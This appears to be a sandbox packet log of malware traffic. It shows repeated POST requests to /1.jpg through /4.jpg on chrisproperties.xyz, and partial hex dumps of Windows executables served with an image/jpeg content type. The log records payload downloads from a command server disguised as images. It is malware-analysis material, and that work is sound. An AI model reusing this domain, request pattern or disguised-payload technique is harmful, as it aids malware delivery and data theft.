Oct 12, 2021 12:35:34.373011112 CEST	1111	IN	HTTP/1.1 200 OK Date: Tue, 12 Oct 2021 10:35:34 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips Last-Modified: Thu, 06 Jun 2019 09:01:52 GMT ETag: "235d0-58aa3f702a000" Accept-Ranges: bytes Content-Length: 144848 Vary: User-Agent Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$l$JOJOJOuOJO?oKNJO?oINJO?oONJO?oNNJOmKNJO-nKNJOKO~JO-nNNJO-nJNJO-nOJO-nHNJORichJOPELb["!bP@0x@`T(@l.text `.rdataDF@@.data @.rsrcx0@@.reloc`@@B
Oct 12, 2021 12:35:34.373075962 CEST	1113	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec a1 5c 22 02 10 85 c0 75 12 e8 37 14 00 00 85 c0 74 04 33 c0 5d c3 a1 5c 22 02 10 5d ff a0 b0 01 00 00 55 8b ec a1 5c 22 02 10 85 c0 75 13 e8 12 14 00 00 85 c0 74 05 83 c8 ff 5d c3 a1 5c 22 02 10 5d Data Ascii: U\"u7t3]\"]U\"ut]\"]U\"uu\"]]U\"ut]\"]U\"ut3]\"]`xU\"ut]\"]U\"
Oct 12, 2021 12:35:34.373104095 CEST	1114	IN	Data Raw: 03 00 00 55 8b ec a1 5c 22 02 10 85 c0 75 13 e8 07 0f 00 00 85 c0 74 05 83 c8 ff 5d c3 a1 5c 22 02 10 5d ff a0 c8 01 00 00 55 8b ec a1 5c 22 02 10 85 c0 75 13 e8 e1 0e 00 00 85 c0 74 05 83 c8 ff 5d c3 a1 5c 22 02 10 5d ff a0 d0 01 00 00 55 8b ec Data Ascii: U\"ut]\"]U\"ut]\"]U\"ut3]\"](U\"uu\"]4]U\"ust]\"]U\"uMt3]\"],U\"u(
Oct 12, 2021 12:35:34.373131990 CEST	1115	IN	Data Raw: 5c 22 02 10 85 c0 75 13 e8 d4 09 00 00 85 c0 74 05 83 c8 ff 5d c3 a1 5c 22 02 10 5d ff 60 44 55 8b ec a1 5c 22 02 10 85 c0 75 0e e8 b1 09 00 00 85 c0 75 09 a1 5c 22 02 10 5d ff 60 3c 5d c3 55 8b ec a1 5c 22 02 10 85 c0 75 13 e8 91 09 00 00 85 c0 Data Ascii: \"ut]\"]`DU\"uu\"]`<]U\"ut]\"]`@U\"unt]\"]\"uKt\"\"u*u\"U\"ut]\"]U\"
Oct 12, 2021 12:35:34.373159885 CEST	1117	IN	Data Raw: c4 02 00 00 5d c3 55 8b ec a1 5c 22 02 10 85 c0 75 0e e8 90 04 00 00 85 c0 75 0c a1 5c 22 02 10 5d ff a0 d0 02 00 00 5d c3 55 8b ec a1 5c 22 02 10 85 c0 75 12 e8 6d 04 00 00 85 c0 74 04 33 c0 5d c3 a1 5c 22 02 10 5d ff a0 e0 02 00 00 55 8b ec a1 Data Ascii: ]U\"uu\"]]U\"umt3]\"]U\"uHt]\"]\"u%t3\"U\"uu\"]]U\"uu\"]4]U\"uu\"
Oct 12, 2021 12:35:34.373199940 CEST	1118	IN	Data Raw: 15 64 d2 01 10 53 89 45 fc e8 91 90 01 00 83 c4 14 8b 45 fc 5f 5e 5b 8b e5 5d c3 55 8b ec 83 ec 0c 53 56 57 68 f6 24 00 10 ff 35 04 20 02 10 ff 15 54 d2 01 10 8b 5d 08 8b f0 59 59 85 f6 74 17 53 56 e8 39 ff ff ff 56 8b f8 ff 15 48 d2 01 10 83 c4 Data Ascii: dSEE_^[]USVWh$5 T]YYtSV9VHueuj]d_^[]U$8"3EVuEWu}Vhtj PEPuVuWuuhhP43PjA}jXDP
Oct 12, 2021 12:35:34.373228073 CEST	1120	IN	Data Raw: 89 45 fc ff 75 18 8b 45 10 ff 75 14 50 ff 75 0c 8d 85 fc fe ff ff ff 75 08 68 70 d4 01 10 68 00 01 00 00 50 ff 15 34 d2 01 10 8d 85 fc fe ff ff 33 c9 50 6a 00 41 83 7d 18 00 6a 03 58 0f 44 c1 50 e8 12 9a 01 00 8b 4d fc 83 c4 2c 33 cd e8 f8 8c 01 Data Ascii: EuEuPuuhphP43PjA}jXDPM,3]U8"3EuEPuuh(hP43PjA}jXDPM(3]U8"3EuEuPuuhhP4
Oct 12, 2021 12:35:34.373255014 CEST	1121	IN	Data Raw: ff 75 10 ff 75 0c ff 75 08 e8 7f fc ff ff 83 c4 1c 8b c6 5e 5d c3 55 8b ec e8 63 0d 00 00 85 c0 75 71 68 03 01 00 00 ff 75 20 ff 75 1c e8 da 0c 00 00 83 c4 0c 85 c0 74 0a 80 38 00 75 05 6a 13 58 5d c3 56 ff 75 24 ff 75 20 ff 75 1c ff 75 18 ff 75 Data Ascii: uuu^]Ucuqhu ut8ujX]Vu$u uuuuuu =x"t!Vu$u uuuuuuZ$^]Uuehuu[t8ujX]Vuuuuuuz=x"tVuuu
Oct 12, 2021 12:35:34.373281956 CEST	1122	IN	Data Raw: 5e 33 cd 5b e8 ce 82 01 00 8b e5 5d c3 55 8b ec 83 3d 70 22 02 10 00 74 05 6a 30 58 5d c3 5d e9 4d 35 00 00 55 8b ec 5d e9 78 36 00 00 55 8b ec 5d e9 76 37 00 00 55 8b ec 81 ec a4 00 00 00 a1 38 22 02 10 33 c5 89 45 fc 83 3d 70 22 02 10 00 56 8b Data Ascii: ^3[]U=p"tj0X]]M5U]x6U]v7U8"3E=p"Vutj0XZWVuk7YYuE9\|"t=9Ft~u2\PuRYP-YYuEu3A~jXDF_M3^]U=p"tj0X]]^U=p"tj0X]]U
Oct 12, 2021 12:35:34.373318911 CEST	1124	IN	Data Raw: 08 e8 eb 3a 00 00 83 c4 0c 5f 5e 5d c3 55 8b ec 83 3d 70 22 02 10 00 74 05 6a 30 58 5d c3 5d e9 b8 3b 00 00 55 8b ec 83 3d 70 22 02 10 00 74 05 6a 30 58 5d c3 5d e9 2f 3c 00 00 55 8b ec e8 ca 02 00 00 85 c0 75 37 56 ff 75 10 ff 75 0c ff 75 08 e8 Data Ascii: :_^]U=p"tj0X]];U=p"tj0X]]/<Uu7Vuuu=x"tVuuuh*^]Uu]x]Uqu]]U]u]]UIu7Vuuun=x"tVuuuh
Oct 12, 2021 12:35:34.399046898 CEST	1125	IN	Data Raw: 8b 5d 14 89 45 e8 8d 85 50 ff ff ff 8b 75 10 89 45 f0 8d 85 14 ff ff ff 68 00 08 00 00 c7 45 ac 6b 43 53 ce c7 45 b4 6a 43 53 ce c7 45 bc 30 01 00 00 c7 45 c4 31 01 00 00 c7 45 cc 70 43 53 ce c7 45 d4 71 43 53 ce c7 45 dc 6c 43 53 ce c7 45 e4 6d Data Ascii: ]EPuEhEkCSEjCSE0E1EpCSEqCSElCSEmCSEnCSEoCSEvEjPVWjqPPP\|xPPPDP8PlP`PW(PYYu,uuPu\PW
Oct 12, 2021 12:35:34.545295000 CEST	1261	OUT	POST /1.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: chrisproperties.xyz Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Oct 12, 2021 12:35:34.572158098 CEST	1263	IN	HTTP/1.1 200 OK Date: Tue, 12 Oct 2021 10:35:34 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips Last-Modified: Mon, 07 Aug 2017 00:52:20 GMT ETag: "9d9d8-5561f424ef900" Accept-Ranges: bytes Content-Length: 645592 Vary: User-Agent Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 08 00 00 0e 00 00 00 38 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 37 37 00 00 00 00 00 94 0b 00 00 00 c0 08 00 00 0c 00 00 00 46 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 39 00 00 00 00 00 04 05 00 00 00 d0 08 00 00 06 00 00 00 52 08 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL=Sv?!X` 8 L'p.text`0`.data@@.rdata$@@@.bss@.edata@0@.idataL@0.CRT@0.tls @0.reloc'(@0B/4`0@@B/19@@B/35MP@B/51`C`D@B/638@B/77F@B/89R
Oct 12, 2021 12:35:36.127759933 CEST	1934	OUT	POST /2.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: chrisproperties.xyz Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Oct 12, 2021 12:35:36.157068014 CEST	1935	IN	HTTP/1.1 200 OK Date: Tue, 12 Oct 2021 10:35:36 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips Last-Modified: Thu, 06 Jun 2019 09:00:58 GMT ETag: "519d0-58aa3f3caa680" Accept-Ranges: bytes Content-Length: 334288 Vary: User-Agent Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$/AVAVAVVAV]@WAV1VAV]BWAV]DWAV]EWAV@WAVO@WAV@VAVOBWAVOEWAVOAWAVOVAVOCWAVRichAVPELb["!f)ps@pP@xP0T@8.textt `.rdata@@.data,H@.rsrcx@@@.relocP@B
Oct 12, 2021 12:35:37.652466059 CEST	2282	OUT	POST /3.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: chrisproperties.xyz Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Oct 12, 2021 12:35:37.679337025 CEST	2283	IN	HTTP/1.1 200 OK Date: Tue, 12 Oct 2021 10:35:37 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips Last-Modified: Thu, 06 Jun 2019 09:01:20 GMT ETag: "217d0-58aa3f51a5800" Accept-Ranges: bytes Content-Length: 137168 Vary: User-Agent Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$U;;;;W;8;?;:;>;:;:w;?;>;;;;9;Rich;PEL_["!z@3@A@t, x0hTTh@l.textxz `.rdata^ef~@@.data@.didat8@.rsrcx @@.reloch0@B
Oct 12, 2021 12:35:37.822369099 CEST	2427	OUT	POST /4.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: chrisproperties.xyz Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
